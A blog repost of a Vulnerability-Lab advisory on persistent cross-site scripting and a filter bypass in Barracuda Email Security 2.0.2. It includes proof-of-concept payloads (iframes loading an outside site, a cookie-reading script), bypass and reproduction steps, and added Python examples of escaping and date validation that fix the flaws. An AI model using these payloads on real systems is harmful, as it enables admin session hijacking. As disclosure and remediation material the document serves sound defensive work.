through h4x0r3d's eyes

Multiple Web Vulnerabilities found in Barracuda EMail Security 2.0.2
ehackingnews.com

Vulnerability-Lab has discovered a filter bypass vulnerability and two persistent input validation vulnerabilities in Barracuda's Email Security Application UI v2.0.2.

The vulnerability allows a remote attacker to bypass the input validation and exception handling in order to inject or display their own malicious persistent content on the application side.

The first vulnerability is located in the Domain Settings > Directory Services > LDAP Host module, with the vulnerable bound name parameter. The second persistent vulnerability is located in the reports module, with the vulnerable bound parameters start date and end date.

Exploitation requires low user interaction and a privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provided us with the proof-of-concept for the two vulnerabilities. Here it is:

POC for First Vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

    <div id="directory-services" class="module">
    <h4 class="module-title">Directory Services</h4>
    <div class="module-content">
    <div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
    alt="loading…"> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
    <div style="float: right;">
    <a href="https://ess.barracudanetworks.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
    <a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
    </div>
    <p class="field">
    <label class="label" for="ldap_host">LDAP Host:</label>
    <input name="ldap_host" id="ldap_host" size="30" value=">"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0" type="text">


URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"


Note:
To bypass the validation, close the tag of the exception-handling message at the beginning with two double quotes.
The mask of the exception (>") is bypassed and the string is executed outside the secure exception-handling message.
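The bypass in this note comes down to the status message treating a pair of quote characters as a safe delimiter instead of encoding the value it reflects. The Python below is an added example, not code from the advisory, Vulnerability-Lab or Barracuda: it assumes a simplified shape for the flawed message (a `>"..."` wrapper around the raw value) and puts the hardened equivalent beside it, which HTML-encodes the LDAP host value for both the notice text and the form's value attribute. The first PoC string from the advisory is used as a regression input; the function and class names are the example's own.

```python
import html
import re
from html.parser import HTMLParser
from typing import Optional

# The first PoC string from the advisory above, used here as a regression input.
POC_LDAP_HOST = '>">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"'

# Opening tags for the elements the PoC tries to smuggle into the page.
DANGEROUS_TAG = re.compile(r"<(iframe|script)\b", re.IGNORECASE)


def notice_naive(host: str) -> str:
    """Assumed shape of the flawed 'exception handling' the note describes: the
    value is wrapped in a >"..." mask and otherwise passed through untouched.
    A value that itself contains >" closes the mask, and everything after it
    reaches the browser as live markup."""
    return f'<div class="warn notice">Connecting to >"{host}"</div>'


def notice_escaped(host: str) -> str:
    """Hardened form: encode the value for the HTML text context it lands in.
    <, >, & and both quote characters become entities, so no tag or attribute
    boundary can open inside the value, however many quotes it carries."""
    return f'<div class="warn notice">Connecting to {html.escape(host, quote=True)}</div>'


def ldap_input_escaped(host: str) -> str:
    """The same value re-emitted into the attribute context of the settings form,
    with quote=True so a stray " cannot terminate the value attribute."""
    return (f'<input name="ldap_host" id="ldap_host" size="30" '
            f'value="{html.escape(host, quote=True)}" type="text">')


def dangerous_tags(fragment: str) -> list:
    """Names of dangerous elements that survive as real tags in a rendered fragment."""
    return [m.group(1).lower() for m in DANGEROUS_TAG.finditer(fragment)]


class _InputParser(HTMLParser):
    """Records every start tag seen and the decoded value attribute of an <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def round_trip_value(fragment: str):
    """Parse a rendered <input> fragment and return (tags seen, decoded value).
    For the escaped form the only tag is the input itself and the decoded value
    is exactly the original host string: the data survived, the markup did not."""
    parser = _InputParser()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.value


if __name__ == "__main__":
    print("naive   :", dangerous_tags(notice_naive(POC_LDAP_HOST)))    # ['iframe']
    print("escaped :", dangerous_tags(notice_escaped(POC_LDAP_HOST)))  # []
    print("form    :", round_trip_value(ldap_input_escaped(POC_LDAP_HOST)))
```

The point of `round_trip_value` is that escaping is lossless: an administrator who really typed that string into the LDAP Host field gets it back unchanged in the form, while the browser never sees an `<iframe>` or a second attribute boundary. The naive mask, by contrast, relies on the value not containing `>"`, which is exactly the assumption the PoC breaks.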

POC for Second Vulnerability:
The persistent web vulnerability can be exploited by remote attackers with a privileged user account and low user interaction.
For demonstration or to reproduce …

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info>


URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start date and an end date.
2. Inject your own persistent script code after the start date and end date.
3. Result: the script code gets executed out of the date listing application context.
4. Save the value with the script code to events for exploitation via the module.
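For the reports module the fix sits upstream of output encoding: a date parameter has a fixed format, so it can be whitelist-validated and rejected before it is ever stored as an event, and anything appended after the date (step 2 of the note) never reaches the listing. The Python below is an added example, not code from the advisory or the product. The handler, the parameter names `start_date` and `end_date`, and the YYYY-MM-DD wire format are assumptions; the sample input is a constructed date with the page's second PoC appended to it.

```python
import html
from datetime import date, datetime

# Constructed sample input: a valid date with the advisory's second PoC appended,
# the way step 2 of the note describes.
POC_DATE_INPUT = '2012-06-20>"<iframe src=http://global-evolution.info>'

DATE_FORMAT = "%Y-%m-%d"  # assumed wire format for the start_date/end_date parameters


class InvalidDateParameter(ValueError):
    """Raised for any report date parameter that is not exactly a YYYY-MM-DD date."""


def parse_report_date(raw: str, name: str) -> date:
    """Whitelist validation: the parameter must parse as a date and must be the
    canonical serialisation of that date. strptime already rejects trailing
    data, so script code appended after a valid date fails here before it can
    be stored; the isoformat comparison additionally rejects sloppy variants."""
    try:
        parsed = datetime.strptime(raw, DATE_FORMAT).date()
    except (TypeError, ValueError):
        raise InvalidDateParameter(f"{name}: expected YYYY-MM-DD, got {raw!r}") from None
    if parsed.isoformat() != raw:
        raise InvalidDateParameter(f"{name}: non-canonical date {raw!r}")
    return parsed


def is_valid_report_date(raw: str) -> bool:
    """Boolean wrapper around parse_report_date for callers that only need accept/reject."""
    try:
        parse_report_date(raw, "date")
        return True
    except InvalidDateParameter:
        return False


def validate_report_range(start_raw: str, end_raw: str):
    """Validate both parameters first, then the relationship between them."""
    start = parse_report_date(start_raw, "start_date")
    end = parse_report_date(end_raw, "end_date")
    if end < start:
        raise InvalidDateParameter("end_date precedes start_date")
    return start, end


def render_date_listing(start: date, end: date) -> str:
    """Output side: serialise from the typed values, never from the raw request
    strings, and HTML-encode anyway as defence in depth."""
    return (f'<p class="field">Start: {html.escape(start.isoformat())} '
            f'End: {html.escape(end.isoformat())}</p>')


def handle_report_request(params: dict):
    """Assumed request handler for the reports module. Returns (accepted, html).
    A rejected request never persists anything, and the error message escapes
    the offending value so the rejection itself cannot become a reflected injection."""
    try:
        start, end = validate_report_range(params.get("start_date", ""),
                                           params.get("end_date", ""))
    except InvalidDateParameter as exc:
        return False, f'<p class="error">{html.escape(str(exc))}</p>'
    return True, render_date_listing(start, end)


if __name__ == "__main__":
    print(handle_report_request({"start_date": "2012-06-20", "end_date": "2012-06-23"}))
    print(handle_report_request({"start_date": POC_DATE_INPUT, "end_date": "2012-06-23"}))
```

Validating the type rather than filtering for dangerous characters is what makes this robust: there is no quoting trick that turns `2012-06-20>"<iframe ...>` into a date, so the filter-bypass pattern from the first vulnerability has nothing to bypass here.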

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

The researcher estimates the vulnerability risk level as medium. Vulnerability-Lab informed the official vendor about the vulnerability; the vendor patched it and released BESS version 2.04.

#Barracuda #Email #injection #vulnerabilities #hackers #hacking #pro-tips